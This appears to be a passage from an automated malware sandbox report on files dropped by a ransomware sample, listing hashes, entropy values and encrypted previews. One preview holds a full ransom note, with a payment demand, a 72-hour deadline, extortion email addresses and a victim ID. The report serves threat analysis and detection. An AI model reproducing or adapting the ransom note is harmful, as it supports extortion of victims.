                                                                                                                                            Preview:.e:.\...>..&.........=~6...T....m.C.@...X.VT>.V`uN....}..kE|..J...8....?.(.(...>lb...&}.7."..[=$.j[....wH...K8e....B.....m.-.. ....7\.*...J..t.".S.................T8...H...9e-Z.Z.n.y..8...=V..i.8.;.|......Y,..J.KjM..c*..C.-Y..Ue|.u..q.kCf..f.l.....%..f2..+.U|G.k./.eI..M..6..?a.&=...}.m[...c..zX_f_...K.=dv.Q.W4.a....y..v./...G..p.s.C-\...6I8.S.._.ated":false}J{..]..+....nq..S...i.Q.{sm......M..\.\.{W.AT}.]lIr..._..7.>.o}......30..-.1.5....UoR.......U.....k.s....g.*.....Os.^...............7...L-...9zl.<."M&l...z..Vr...V.F..Y.mB.(.....]....^...6;.....0.(.....G.r`...=...sw.k.|I.M..+...L...BH~..A.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):295178
                                                                                                                                            Entropy (8bit):0.3001887459448677
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+GpCE8M7ytmdU1zkVmvQhyn+Zoz67z3va:+Gp6mdU63va
                                                                                                                                            MD5:FAFEB8C62A2338A7A0FDB0D0D648BC80
                                                                                                                                            SHA1:A0DD386FD2C7C555F72201BFBDECC8A7F6499892
                                                                                                                                            SHA-256:61FA297AEC56B9F8122B78228E3F8D621EBDC7CC95077EFD91B03EC1F54263A2
                                                                                                                                            SHA-512:CCF0F45B15C9FF3448BDA5AED602A9977989E8E0F6DE4B7CA42275BECEEDA760258BEF8263E9DE9D0B02694701235302D46D4405D5E62FEF7A954D2269CB9A3C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.uG..0.U......f.(g.g.P..Z1..F....rI.~..S...H.0.}....g.N.......].e..&y...7$..Er!r{.2H.S........r.3...L.*........)..l. .%.B......~.Q.O{y..X...ZD...>..od.. 5..r....1...M..G...x........w.J.E.Y.]....x?..B^.2x..o...d....r..;.i..`t..,.3.O..o.1e=...x.bt..4..].R.i.iZ$.q..v..[.S!z.......h...x.#.% ......Z..I&,.z.}...P..S.8g....L.b.,..X]..".*..Xu.... .Q.K....7....r.Q...T.a........W:r.w...C]..U...Q....q.Nq..4...;`.)y...@.L.i.T.F.T........._..(axV.`........8..j..$.q.y\mh.+&h......Yt$RRZ.R.p..hi......C.HP..F>Z.6s....L..L..Ox....e..*..~......iW..U.R$..1.D)x+..........|..............Dx.y...t.._..lU..\K..G(...R.9M.biz........F.v.=.j7....]......E........C.W..A.\. .....Q.~.Xmc...U...'ONn.%.D>R.|....=.^/....V..Y.x.<U..y......"H7..._x...S6..BUH..uRZ.6W........V.9;..'..Q.U$n..f..[..........6X....?vV....9.x{...9.L._..[%.b.'.....+.4.....[P.:.=0c.......;T.^9.........3.u[..v.S.....)B.C2...F.....v...0.!v..m...go5...!.VG.?.i$....>......$.I....J.a./`2#...O12.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):295178
                                                                                                                                            Entropy (8bit):0.3001887459448677
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+GpCE8M7ytmdU1zkVmvQhyn+Zoz67z3va:+Gp6mdU63va
                                                                                                                                            MD5:FAFEB8C62A2338A7A0FDB0D0D648BC80
                                                                                                                                            SHA1:A0DD386FD2C7C555F72201BFBDECC8A7F6499892
                                                                                                                                            SHA-256:61FA297AEC56B9F8122B78228E3F8D621EBDC7CC95077EFD91B03EC1F54263A2
                                                                                                                                            SHA-512:CCF0F45B15C9FF3448BDA5AED602A9977989E8E0F6DE4B7CA42275BECEEDA760258BEF8263E9DE9D0B02694701235302D46D4405D5E62FEF7A954D2269CB9A3C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.uG..0.U......f.(g.g.P..Z1..F....rI.~..S...H.0.}....g.N.......].e..&y...7$..Er!r{.2H.S........r.3...L.*........)..l. .%.B......~.Q.O{y..X...ZD...>..od.. 5..r....1...M..G...x........w.J.E.Y.]....x?..B^.2x..o...d....r..;.i..`t..,.3.O..o.1e=...x.bt..4..].R.i.iZ$.q..v..[.S!z.......h...x.#.% ......Z..I&,.z.}...P..S.8g....L.b.,..X]..".*..Xu.... .Q.K....7....r.Q...T.a........W:r.w...C]..U...Q....q.Nq..4...;`.)y...@.L.i.T.F.T........._..(axV.`........8..j..$.q.y\mh.+&h......Yt$RRZ.R.p..hi......C.HP..F>Z.6s....L..L..Ox....e..*..~......iW..U.R$..1.D)x+..........|..............Dx.y...t.._..lU..\K..G(...R.9M.biz........F.v.=.j7....]......E........C.W..A.\. .....Q.~.Xmc...U...'ONn.%.D>R.|....=.^/....V..Y.x.<U..y......"H7..._x...S6..BUH..uRZ.6W........V.9;..'..Q.U$n..f..[..........6X....?vV....9.x{...9.L._..[%.b.'.....+.4.....[P.:.=0c.......;T.^9.........3.u[..v.S.....)B.C2...F.....v...0.!v..m...go5...!.VG.?.i$....>......$.I....J.a./`2#...O12.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.19524614633807
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:UCFozHUccoLKQhM9rINKsTspSaqLQmuR0vg6NGFgafAHn:CzHUccoBm9s7TspSaqLI0vXUFgaKn
                                                                                                                                            MD5:09C4A8E9B6D62F84E578AEB989324531
                                                                                                                                            SHA1:15096A3BCB6DAF0E2BA3DF11A746E1EDA5C5B6FB
                                                                                                                                            SHA-256:FEC66F354AAD634219CB497EAD78104ACB9A534AD5C607394A6BDC1A88C940C6
                                                                                                                                            SHA-512:BC953281F30DED1B6E3E1060B4627239D9B8D0F1316F2638C45B3818975B40E12391F7AB4B95AFAC68ADD262CF15433FBDA921E1B74293564B18D5660A6C8FE7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..>....<^ps.FY>...........<..W...........q..A...V.[F...p....d;.8..8.C.3/P..........C.}.3.\5b........X.0.$C./..U.4..B.......^..:..(.....ARG.......P.F.g.....r.,.ss..\.\..E@d.2....M&..{..|/.n..m,.xe...+v.G(.Y....&.M...L.[).#*_.....m...<s7... .s.h...N..k.F...\..l.......(o.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98570
                                                                                                                                            Entropy (8bit):0.659538760512424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:le+x6uzd4iHSgEgAJ4VHdgBH1VsHc6P3sVYEEAOd7htNujoo8i:le+xbiiygEg/kH1YEmAC1o8i
                                                                                                                                            MD5:74F610BE26701AB9EAC2885450ACFA21
                                                                                                                                            SHA1:67DBDF66BE86013CDEB086EAACD0A1BAF06AAEA5
                                                                                                                                            SHA-256:272E085C744589A181653EB42F0F1D25D3EAA4BBD931BD1CA000B655E0B341FC
                                                                                                                                            SHA-512:E8A42795238A70D7BF8D09700BBA040B2C8C7D93C57D51E86C9FF4B8E28CAFEE6D53BB258BD8A61B5EE043A263045CE8CE574AE94568ECCE4245237FAED50361
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.k.x....\o.....+.#%.l......L3i....esc9....9...../.......N...d.k.4.A.....Y.b..'.X.._..e-....m....Zg.....J.Y.rZ.........V....q"k%..ju..ygT.m.DI.B5i...VnP.....+..-t..1....L..?./]..|..B...rq.....Ut_+1?)$..@.}....1.D7.z..~.[.m....8.s...%....v..^.A.@C..|A#kE.]..F.X.9ub.[C.G.v.4..(G...<Es<.....`..qZI<.%/....8.G.}....K.3g.LV..._2...`.>@............7.....U.....q.....zj......-..g...L.e|.$..pM2........Z.bA.)..|).Qw8..pg.P.cba..t!.x.Ru.A...Z<.Z.{...M|.f.$.C...G..d...9..e.$..w......^......H.lh.=v..K..cd.J.....N..4..;@Z(u...z.fYH.72_.K9(.G.W....l.-X..&.S..O.T.o...=.....7k.o..s..4k...3.$...<..|.%b..G../..?.L....l\N..b..#]..,.....==....5..U..fO.O....D...^M>..&..w.......~!....U{O.5(-..!2u.....5A_1.~...4. ../....S~xS......}...v.Ssy.U....uE.d.....x.W64...=..F...).h0z.9.;.NM..a.Bw........*....A..F-M3...Yq@.......E..{a..R..e...i}...'..E|.H.9T[...y........h..%.C.5...Q.........@oM..Q2...6mE..5....6...`...].9...{...C[..MN.7 .0...m.B.}..j../..F3..~...:...i.1..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98570
                                                                                                                                            Entropy (8bit):0.659538760512424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:le+x6uzd4iHSgEgAJ4VHdgBH1VsHc6P3sVYEEAOd7htNujoo8i:le+xbiiygEg/kH1YEmAC1o8i
                                                                                                                                            MD5:74F610BE26701AB9EAC2885450ACFA21
                                                                                                                                            SHA1:67DBDF66BE86013CDEB086EAACD0A1BAF06AAEA5
                                                                                                                                            SHA-256:272E085C744589A181653EB42F0F1D25D3EAA4BBD931BD1CA000B655E0B341FC
                                                                                                                                            SHA-512:E8A42795238A70D7BF8D09700BBA040B2C8C7D93C57D51E86C9FF4B8E28CAFEE6D53BB258BD8A61B5EE043A263045CE8CE574AE94568ECCE4245237FAED50361
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.k.x....\o.....+.#%.l......L3i....esc9....9...../.......N...d.k.4.A.....Y.b..'.X.._..e-....m....Zg.....J.Y.rZ.........V....q"k%..ju..ygT.m.DI.B5i...VnP.....+..-t..1....L..?./]..|..B...rq.....Ut_+1?)$..@.}....1.D7.z..~.[.m....8.s...%....v..^.A.@C..|A#kE.]..F.X.9ub.[C.G.v.4..(G...<Es<.....`..qZI<.%/....8.G.}....K.3g.LV..._2...`.>@............7.....U.....q.....zj......-..g...L.e|.$..pM2........Z.bA.)..|).Qw8..pg.P.cba..t!.x.Ru.A...Z<.Z.{...M|.f.$.C...G..d...9..e.$..w......^......H.lh.=v..K..cd.J.....N..4..;@Z(u...z.fYH.72_.K9(.G.W....l.-X..&.S..O.T.o...=.....7k.o..s..4k...3.$...<..|.%b..G../..?.L....l\N..b..#]..,.....==....5..U..fO.O....D...^M>..&..w.......~!....U{O.5(-..!2u.....5A_1.~...4. ../....S~xS......}...v.Ssy.U....uE.d.....x.W64...=..F...).h0z.9.;.NM..a.Bw........*....A..F-M3...Yq@.......E..{a..R..e...i}...'..E|.H.9T[...y........h..%.C.5...Q.........@oM..Q2...6mE..5....6...`...].9...{...C[..MN.7 .0...m.B.}..j../..F3..~...:...i.1..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):782
                                                                                                                                            Entropy (8bit):7.743353117863736
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:b+YpxMWGLrCAtjCryUGko/24om12Q2cAuZTT:bnpxMAcjCryH23m12naZTT
                                                                                                                                            MD5:EBB51BF0DBA2C0C56ECB83482080E978
                                                                                                                                            SHA1:539FBD1648F594181EC9FA7B8F0EFF816B3B6F4E
                                                                                                                                            SHA-256:C5384D204C6F26CAF226FA9CBFE3C84F8DB6AEBDBCC08898C4EB5392F297921F
                                                                                                                                            SHA-512:B69FD10C912A9976FBA7A2079CCC0D99E86342521D724CC4C9A2EF6B1D21E7C3A6A435EB1F42556FB264E79231A64242CDED97299663C402B25D84E1C673BF49
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..=...M!.!].........M.J.~.I....".w.~....h.5....]=.....]......1.........J6+>i.mtV-...0.........V)..q.....q........o.N.P.?. .+....P.H(l..ia.a....g.#.)...|"V.^.J..r.(m...z..../*...=...w..$...-.,.p." ....W.I..L.s.Y.O.@;.,.@~....G{.)..X..nx..i.b.M\..CZz....')-.fRW .fJ..".UP6.q......y......J}J2...B...o.p..~..../....Q....@..^..[..../..........u..+...e.C.=*,....J.b.....m..+.gLzvg..@.R...7>1........@...;>M..MBDd...F...d.o.C.e.......P.+..V.*..k..r.*KX<..]....q..._h.eI...0.N.$.T..^.._5.1R.....b......v..7..;.....}v .....G.......:8..R..`s...p!..6.'.],...l.u.*...B....jHcrO.1.UgV.fW.........Y>p$PjJ.1,_....U....|5Y.....#.E).'...O.&T_.W...w$..%W.1...]@..p.>m...?'hP.........cM.."...{1k!..Md....&....LD.(......H....r................Xl..}....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):782
                                                                                                                                            Entropy (8bit):7.743353117863736
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:b+YpxMWGLrCAtjCryUGko/24om12Q2cAuZTT:bnpxMAcjCryH23m12naZTT
                                                                                                                                            MD5:EBB51BF0DBA2C0C56ECB83482080E978
                                                                                                                                            SHA1:539FBD1648F594181EC9FA7B8F0EFF816B3B6F4E
                                                                                                                                            SHA-256:C5384D204C6F26CAF226FA9CBFE3C84F8DB6AEBDBCC08898C4EB5392F297921F
                                                                                                                                            SHA-512:B69FD10C912A9976FBA7A2079CCC0D99E86342521D724CC4C9A2EF6B1D21E7C3A6A435EB1F42556FB264E79231A64242CDED97299663C402B25D84E1C673BF49
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..=...M!.!].........M.J.~.I....".w.~....h.5....]=.....]......1.........J6+>i.mtV-...0.........V)..q.....q........o.N.P.?. .+....P.H(l..ia.a....g.#.)...|"V.^.J..r.(m...z..../*...=...w..$...-.,.p." ....W.I..L.s.Y.O.@;.,.@~....G{.)..X..nx..i.b.M\..CZz....')-.fRW .fJ..".UP6.q......y......J}J2...B...o.p..~..../....Q....@..^..[..../..........u..+...e.C.=*,....J.b.....m..+.gLzvg..@.R...7>1........@...;>M..MBDd...F...d.o.C.e.......P.+..V.*..k..r.*KX<..]....q..._h.eI...0.N.$.T..^.._5.1R.....b......v..7..;.....}v .....G.......:8..R..`s...p!..6.'.],...l.u.*...B....jHcrO.1.UgV.fW.........Y>p$PjJ.1,_....U....|5Y.....#.E).'...O.&T_.W...w$..%W.1...]@..p.>m...?'hP.........cM.."...{1k!..Md....&....LD.(......H....r................Xl..}....0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5243146
                                                                                                                                            Entropy (8bit):0.05303925331949547
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Ebltw/YkugNjrr54w0VW3xWmfRFj381A3:Ww/Yk5jrqVW3oqB8e3
                                                                                                                                            MD5:609E4FD70663C698A45D71DFB3AEA8F4
                                                                                                                                            SHA1:32D9FF09B0AD4169DD591D80802FEF95CF8B2E9D
                                                                                                                                            SHA-256:1034115BCCA64517A2E0A8FE0F68B0F389360D6418EE89E2BFAAAE69A91C48BD
                                                                                                                                            SHA-512:2DC5331445C508D87CA37EDECD4EF06BEE9F312C149CBCA8BE7D6DF93798EE565C91CFBC85C77CA022B6420F68BA69B0976CE4C52A9E5AE25058E17D021566AD
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.@r.!)...E....QqE..0.......tk.....S......;.G-T.$...{.%..//k%.I..).. c......Qq!.....%&..tL..g..lm!Y..g.j....r..]w..J.U..[?{-.i 5.Y.Xak..9^.N..s...Ww <..$r}C.......r.......w....+...%..Hc.@..Y..;.8F~..E.u.j f..:.Y..P.Fzy.7..HL.,Z.j....BQ:...(cMv..U......#q.h....v....(P..t..,..25..H.....C.....M...K.8QR...dE".>......u.dY=n.."2.......ZE..5..mx?..(:.h..7..f............Mjn"(..|....IY/.._...z|>....1.p....Q.o..l".K..k.....5..@.i.....@.....~.RqMZB^..S.....:.=%("P.(5..I.:v._.c.]P.rY..........|3(.OI&.kt#.J........x.|# i.Z.7..n..V...."......Z....E..-#. ..i.4...N...=..b.G..D ..&.H.'.......!.s.[.b...N^...r...NE......Fc=..v.d.Z.uV..I........9..8...%u..W.....-EX...#.|.S....4wp.q..w.g.C.L.1.R.......-.7h..u..7.$..'gD=T...2.....r9;........*.}...Rj..=|......G...B.O.bM.5...Wi.....Q.K!.....l.jv....A.W...e&TX.(.*[.G....-g.;...g...)..0z...O..ugc-........6.v...qZ...6iG..q.....!....S#.T1f.)!...|I.g.{.......*y.m>.......V.....#........_.Y."..2 .....4.l..>....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6102916709646384
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:mcloGOx2l28eDJS4LWquefSAmiansBPnooiETBCfoP52:mcloGOx2EdXLRK/sBPnoVETBCu0
                                                                                                                                            MD5:24540D8E9FB6EC71112EDE872B6B9D99
                                                                                                                                            SHA1:B19FD0694DF859750BA251D0670607489522B217
                                                                                                                                            SHA-256:C540B1C379F35DF0F1F86CDC1A20116F995773E27FB864FF0C4E89B8F806FF2A
                                                                                                                                            SHA-512:E165DAFB59D926DEC6B532E221959452039273955A42B3FAE1EA5405B8B9243FB177FD558E4A4073171A76DCC0257A28F4D456F3650B4525CCFBD25F2337F657
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:7.._t.A.{.D3.9.....u..ZS.q...h...e.dZ.+>.....|....a].....8....>{...W...Q2I..:..<..gTG......Q.;.b....M/.>.........*B....H6:"..U....V.ay.^.u......E~....N...#%....w..g.4"."I........4....<.9..Hg..!..=..Rm&pk....3hip..'..L..f^.|I.3.F...........L.H...\....Ku..C.G..@q;D.Yc@bN.:.....W..."...P?Y.G.YG...|9....=.-.s.......p....I3E..Tk......oL...C..... w..<m.]......od....Tl.[..K..w...d..Q].$..6vr.n..^..:....u..36...N....6.$........."..L....`uU...!Zr..F..q...+.G.^...d.....,G5..G..?..F..\ +B_(..t...w.;.v.d>...s..>...H.j.C..,Z....?."..y5:....y8.c.M..\yf..._..4.z0o....$..o(}{...*..WV...n........]X. _..........~.$..'.@.......].9nW.~.$...b.r....~.|.8_..........c...f9...C..[..1 R2~m.M.{....bY.E-._V@d1I.Szu.&.}<O..8.\.}3O.H.y.L.&.`..T.Q..{xow.}&..e...._O..-..x.v.e.d....CR..'.F../x...K.&...[0H.7...8..m..i8.W...}.....0.Q..40%........4y.iM.h.........&RA.p..O..........V....i.c/._E=.Z=..Z..Z...'P.4'w.y.........#...[$%.Y=.(..K<>.".Oo.vG#..M.._.....H+.Tk.3w...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6102916709646384
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:mcloGOx2l28eDJS4LWquefSAmiansBPnooiETBCfoP52:mcloGOx2EdXLRK/sBPnoVETBCu0
                                                                                                                                            MD5:24540D8E9FB6EC71112EDE872B6B9D99
                                                                                                                                            SHA1:B19FD0694DF859750BA251D0670607489522B217
                                                                                                                                            SHA-256:C540B1C379F35DF0F1F86CDC1A20116F995773E27FB864FF0C4E89B8F806FF2A
                                                                                                                                            SHA-512:E165DAFB59D926DEC6B532E221959452039273955A42B3FAE1EA5405B8B9243FB177FD558E4A4073171A76DCC0257A28F4D456F3650B4525CCFBD25F2337F657
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:7.._t.A.{.D3.9.....u..ZS.q...h...e.dZ.+>.....|....a].....8....>{...W...Q2I..:..<..gTG......Q.;.b....M/.>.........*B....H6:"..U....V.ay.^.u......E~....N...#%....w..g.4"."I........4....<.9..Hg..!..=..Rm&pk....3hip..'..L..f^.|I.3.F...........L.H...\....Ku..C.G..@q;D.Yc@bN.:.....W..."...P?Y.G.YG...|9....=.-.s.......p....I3E..Tk......oL...C..... w..<m.]......od....Tl.[..K..w...d..Q].$..6vr.n..^..:....u..36...N....6.$........."..L....`uU...!Zr..F..q...+.G.^...d.....,G5..G..?..F..\ +B_(..t...w.;.v.d>...s..>...H.j.C..,Z....?."..y5:....y8.c.M..\yf..._..4.z0o....$..o(}{...*..WV...n........]X. _..........~.$..'.@.......].9nW.~.$...b.r....~.|.8_..........c...f9...C..[..1 R2~m.M.{....bY.E-._V@d1I.Szu.&.}<O..8.\.}3O.H.y.L.&.`..T.Q..{xow.}&..e...._O..-..x.v.e.d....CR..'.F../x...K.&...[0H.7...8..m..i8.W...}.....0.Q..40%........4y.iM.h.........&RA.p..O..........V....i.c/._E=.Z=..Z..Z...'P.4'w.y.........#...[$%.Y=.(..K<>.".Oo.vG#..M.._.....H+.Tk.3w...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.1043038293451115
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:G/qJllxfhsfw4F4r/efXKok1w7S6OpzG+d3Lq8TEZwg2n:7lxf6o4Cr/eCD1hFdG6q8TEZEn
                                                                                                                                            MD5:450F9F4DCC06957162F8A3A0F47F3444
                                                                                                                                            SHA1:3E3791F84B6BEACC9C04158CBA25517EB2A5EE78
                                                                                                                                            SHA-256:36F2D90E4FE9A0CC29B3D70E92D84B7CDA95042BB2AF59FC00202964D3A862C0
                                                                                                                                            SHA-512:A99AAF25CBD1FA498D6CC37EDE92E9AD1E65AA867E01101194B352E8EEC60C4A4D35BC032C8A6A3C6CC51BFB66F9169BDCFF110B05AE8EC87A74E2A8E004F8AD
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:).zA.n(.c.*~..9=............)....m..V..z5...d..:..Wh... ..:.t.RX.B(...].C'.."...V...ke....v.+..T.....w.ze.N...s'.*f^1..n...'......|s.\.k...+u9...0.Q%=...>.@............x..a...!...?.=.X..X.....z.Y.NDf......_..i!.7.K.ma.._.L...T7.. .H.......>\Y.U..+..LD.3)9s..4......=.+..!0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5243146
                                                                                                                                            Entropy (8bit):0.05303925331949547
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Ebltw/YkugNjrr54w0VW3xWmfRFj381A3:Ww/Yk5jrqVW3oqB8e3
                                                                                                                                            MD5:609E4FD70663C698A45D71DFB3AEA8F4
                                                                                                                                            SHA1:32D9FF09B0AD4169DD591D80802FEF95CF8B2E9D
                                                                                                                                            SHA-256:1034115BCCA64517A2E0A8FE0F68B0F389360D6418EE89E2BFAAAE69A91C48BD
                                                                                                                                            SHA-512:2DC5331445C508D87CA37EDECD4EF06BEE9F312C149CBCA8BE7D6DF93798EE565C91CFBC85C77CA022B6420F68BA69B0976CE4C52A9E5AE25058E17D021566AD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.@r.!)...E....QqE..0.......tk.....S......;.G-T.$...{.%..//k%.I..).. c......Qq!.....%&..tL..g..lm!Y..g.j....r..]w..J.U..[?{-.i 5.Y.Xak..9^.N..s...Ww <..$r}C.......r.......w....+...%..Hc.@..Y..;.8F~..E.u.j f..:.Y..P.Fzy.7..HL.,Z.j....BQ:...(cMv..U......#q.h....v....(P..t..,..25..H.....C.....M...K.8QR...dE".>......u.dY=n.."2.......ZE..5..mx?..(:.h..7..f............Mjn"(..|....IY/.._...z|>....1.p....Q.o..l".K..k.....5..@.i.....@.....~.RqMZB^..S.....:.=%("P.(5..I.:v._.c.]P.rY..........|3(.OI&.kt#.J........x.|# i.Z.7..n..V...."......Z....E..-#. ..i.4...N...=..b.G..D ..&.H.'.......!.s.[.b...N^...r...NE......Fc=..v.d.Z.uV..I........9..8...%u..W.....-EX...#.|.S....4wp.q..w.g.C.L.1.R.......-.7h..u..7.$..'gD=T...2.....r9;........*.}...Rj..=|......G...B.O.bM.5...Wi.....Q.K!.....l.jv....A.W...e&TX.(.*[.G....-g.;...g...)..0z...O..ugc-........6.v...qZ...6iG..q.....!....S#.T1f.)!...|I.g.{.......*y.m>.......V.....#........_.Y."..2 .....4.l..>....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9792
                                                                                                                                            Entropy (8bit):7.163314647024265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:k6YgTjCZZB35jz9Dv9CY/aUhUxaXd6Y4nysZM2WklbBNBw8DUSw+gB:k5gTjCZX35jJb9RyCUvY4ysn7tpwxTx
                                                                                                                                            MD5:B3DFF31129B72DC312396C451A689952
                                                                                                                                            SHA1:8F5033F26B258494439F54C6CC9159FD88CFB163
                                                                                                                                            SHA-256:15D4F5F8DEEACEE1D01F53234DF671CB8866723527917D351B9AF10E97DB78C8
                                                                                                                                            SHA-512:AC4E60589A23F408DBFC6B015408ED81FBFB5C4989F68B4A649CF0E20B6097921C6216F8B1FC25D784776ED7C6656F917BB3367A901229DA02CC6FD0B6034408
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:M.........gH...y..,o-.1V8...\u..%$l:......*..j?..g.E...$...M..n..X...j..yw..xN..%@..q.L%..4. ..A<...F.U.r......GU......u.X..1--H...6...<.<9..d...h...r.........V.<...\.[c.m....\}]......}..&......Ay(.8.'...i0*...CZ57:8.....]...G...$.ec..5dq$E....x.....$'..|V,.....1-..bu...K...@~.c.r.V..6.SS....I_.*.q..q..=...U.DL>3....,@..:.h*'..j...f.....t.8.. ..i.\..\L.,o.9H?l..G.@.....S.....`pD.U....:...a..-...C.r......#G.e.'..&........_..h...E.k.l..0..l...g.#~...)..%...*5,..x.Z.}...Q..8....vl...x....:..._K....n..........-^...Oc.OV{.I...R.(+.....B0X._.x..j.&YL.I.i....=..a.nAOG.h......^...e..._..W.X..s..((\.hW.E..)g...n...^.Q..[.F....Y*4...+.>.A]...M..$v.<..|..h.!=.. 2.!..E..L......:...Ur,.p/...-T.\...?....Q........J.&..;^..0%db&.;..,.;.26I.h.Z..d1.U-....[A.Y%JA)S.....]w^.;...i>..8...U.....E...r.d..^.....U...J&...M.NK...{....Z)..........3..#x...->.4...U..Y.R..4X...U..(...&@FLaC.....6D..AY_...q{N..._.*`.`.c./...G*k ........Hi.u..k..<.t,(.U..Y...f..W..q`qJ..d\.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9792
                                                                                                                                            Entropy (8bit):7.163314647024265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:k6YgTjCZZB35jz9Dv9CY/aUhUxaXd6Y4nysZM2WklbBNBw8DUSw+gB:k5gTjCZX35jJb9RyCUvY4ysn7tpwxTx
                                                                                                                                            MD5:B3DFF31129B72DC312396C451A689952
                                                                                                                                            SHA1:8F5033F26B258494439F54C6CC9159FD88CFB163
                                                                                                                                            SHA-256:15D4F5F8DEEACEE1D01F53234DF671CB8866723527917D351B9AF10E97DB78C8
